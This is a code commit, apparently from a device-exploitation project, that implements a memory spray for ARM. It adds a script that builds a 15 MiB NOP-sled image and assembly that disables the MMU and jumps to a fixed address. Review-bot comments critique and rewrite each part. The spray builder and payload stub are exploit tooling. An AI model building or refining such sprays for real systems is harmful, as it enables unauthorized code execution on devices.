Implement memory spray
This commit is contained in:
parent
60d409f947
commit
7372479efc
12
x1/Makefile
12
x1/Makefile
@ -7,7 +7,7 @@ all: return.bin mrc.bin c/main.bin
.PHONY:
clean:
@rm -f *.bin */*.bin
@rm -f *.bin spray/*.bin c/*.bin
%.bin: %.S
@$(AS) $<
@ -17,4 +17,12 @@ clean:
c/main.bin:
@$(CC) -nostdlib -static -fPIC -mcpu=cortex-a7 c/start.S c/main.c
@./extract.py a.out $@
#@rm -f a.out
@rm -f a.out
spray/main.bin:
@$(AS) spray/top.S
@./extract.py -p a.out spray/top.bin
@$(AS) spray/bottom.S
@./extract.py -p a.out spray/bottom.bin
@./append_nop.py 15728640 spray/top.bin spray/bottom.bin spray/main.bin
@rm -f a.out
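Review bot: `spray/main.bin:` in the second hunk declares no prerequisites, so once the file exists make considers it up to date and never rebuilds it after spray/top.S, spray/bottom.S or append_nop.py change; `spray/main.bin: spray/top.S spray/bottom.S append_nop.py` fixes that (the pre-existing `c/main.bin:` has the same shape). Both recipes also assemble into a shared `a.out` in the working directory and then `rm -f` it, so under `make -j` one target can read or delete the other's intermediate; per-target outputs such as `$(AS) -o spray/top.o spray/top.S` with the matching path passed to extract.py avoid the race. The hunk-header context `all: return.bin mrc.bin c/main.bin` suggests `all` does not list `spray/main.bin`, though that line itself is outside the hunk.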
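--- a/x1/append_nop.py
+++ b/x1/append_nop.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python3
+
+import sys
+
+
+def main():
+    if len(sys.argv) < 5:
+        print(f'Usage: {sys.argv[0]} N top.bin bottom.bin out.bin', file=sys.stderr)
+        sys.exit(1)
+
+    with open(sys.argv[2], 'rb') as topf, open(sys.argv[3], 'rb') as bottomf, open(sys.argv[4], 'wb') as out:
+        top, bottom = topf.read(), bottomf.read()
+        out.write(top)
+        for i in range((1024 * 64 - len(top) - len(bottom)) // 4):
+            out.write(b'\x00\x00\xa0\xe1')
+        out.write(bottom)
+
+        for i in range(1024 * 1024 * 15 // (1024 * 64) - 1):
+            for i in range((1024 * 64 - len(bottom)) // 4):
+                out.write(b'\x00\x00\xa0\xe1')
+            out.write(bottom)
+
+
+main()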
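Review bot: The `N` argument that the usage check demands is never read — the total size is hard-coded as `1024 * 1024 * 15` and the chunk size as `1024 * 64`, so the `15728640` the Makefile passes is silently ignored and any other value would produce the same output. The two `range(...)` expressions also go negative when `top.bin` plus `bottom.bin` exceed one chunk, which `range` turns into zero iterations, so the first chunk comes out short with no error. Writing the four-byte filler one `write()` call at a time is roughly four million calls for 15 MiB; building each chunk as one bytes object is both faster and clearer, and naming the filler makes its meaning visible (`b'\x00\x00\xa0\xe1'` is the little-endian encoding of ARM `mov r0, r0`, 0xE1A00000). Suggested rewrite of the body, with the usage check unchanged:

```python
NOP = b'\x00\x00\xa0\xe1'   # ARM 'mov r0, r0' (0xE1A00000, little-endian)
CHUNK = 1024 * 64           # each emitted chunk ends with bottom.bin

def main():
    # … unchanged: usage check …
    total = int(sys.argv[1])
    if total % CHUNK:
        sys.exit(f'N must be a multiple of {CHUNK}')
    with open(sys.argv[2], 'rb') as topf, open(sys.argv[3], 'rb') as bottomf, open(sys.argv[4], 'wb') as out:
        top, bottom = topf.read(), bottomf.read()
        pad = CHUNK - len(top) - len(bottom)
        if pad < 0:
            sys.exit('top.bin plus bottom.bin exceed one chunk')
        out.write(top + NOP * (pad // 4) + bottom)
        for _ in range(total // CHUNK - 1):
            out.write(NOP * ((CHUNK - len(bottom)) // 4) + bottom)
```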
@ -9,7 +9,7 @@ def main():
print(f'Usage: {sys.argv[0]} in.elf out.bin')
sys.exit(1)
with open(sys.argv[1], 'rb') as f:
with open(sys.argv[-2], 'rb') as f:
extract(ELFFile(f))
@ -19,7 +19,11 @@ def extract(elf):
print('Input ELF has no .text section', file=sys.stderr)
sys.exit(1)
with open(sys.argv[2], 'wb') as f:
with open(sys.argv[-1], 'wb') as f:
if '-p' in sys.argv:
print(f'Pure .text mode is enabled')
f.write(text.data())
else:
elf.stream.seek(0)
elf.stream.read(text.header.sh_offset)
f.write(elf.stream.read())
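Review bot: `'-p' in sys.argv` in the second hunk treats any argument equal to `-p` as the flag, and because the usage check in the first hunk (its condition sits above the hunk) seems to count `-p` as a positional, `extract.py -p out.bin` would pass the check and open `-p` as the ELF through `sys.argv[-2]`; stripping the flag first, `args = [a for a in sys.argv[1:] if a != '-p']` and indexing `args[0]`/`args[1]`, or switching to argparse, removes both problems. The new `print(f'Pure .text mode is enabled')` is an f-string with no placeholders and goes to stdout, while the neighbouring `Input ELF has no .text section` diagnostic goes to stderr; `print('Pure .text mode is enabled', file=sys.stderr)` keeps the binary output stream clean for callers that redirect stdout. The file header for this section is missing from the page; the Makefile's `./extract.py -p` call suggests it is extract.py.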
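--- a/x1/spray/bottom.S
+++ b/x1/spray/bottom.S
@@ -0,0 +1,9 @@
+.text
+.align 2
+.global _start
+
+_start:
+loop:
+	b loop
+	ldr r0, =0x00000000
+	mov pc, r0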
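Review bot: `ldr r0, =0x00000000` and `mov pc, r0` are unreachable, since `loop: b loop` immediately above never falls through; either drop them or add a comment explaining why they are kept. If they stay, note that `ldr r0, =...` makes gas emit a literal-pool word at the end of `.text`, so the `extract.py -p` output carries a data word after the last instruction — harmless here because append_nop.py only uses `len(bottom)`, but `mov r0, #0` encodes the same value without a pool entry. A one-line header such as `@ Tail of every 64 KiB chunk: spin here once reached` would tell the reader what this file is for, and a local label (`1: b 1b`) would avoid exporting `loop` as a symbol.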
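--- a/x1/spray/top.S
+++ b/x1/spray/top.S
@@ -0,0 +1,16 @@
+.text
+.align 2
+.global _start
+
+_start:
+	mov r9, #0
+	ldr r0, =0x67800000
+
+	mrc p15, 0, r10, c1, c0, 0
+	bic r10, r10, #1 @ disable MMU and dcache
+	@bic r10, r10, #4096 @ disable icache
+	mcr p15, 0, r10, c1, c0, 0 // write ctrl regs
+	#mcr p15, 0, r9, c7, c7, 0 // invalidate cache
+	#mcr p15, 0, r9, c8, c7, 0 // invalidate TLB
+	mov pc, r0
+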
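Review bot: The comment on `bic r10, r10, #1` says "disable MMU and dcache", but the mask clears only bit 0 of SCTLR (M, the MMU enable); the data cache is controlled by a different bit that this instruction leaves untouched, so the comment should read `@ clear SCTLR.M (disable MMU)` to match what the code does. `mov r9, #0` is a dead store — its only readers are the two commented-out `#mcr` invalidate lines — and the file mixes three comment syntaxes (`@`, `//`, `#`), where `@` is the conventional ARM gas form. A header comment stating the file's role (head of the first spray chunk: read SCTLR, clear M, write it back, then branch to 0x67800000) would let a reader understand it without cross-referencing the Makefile and append_nop.py.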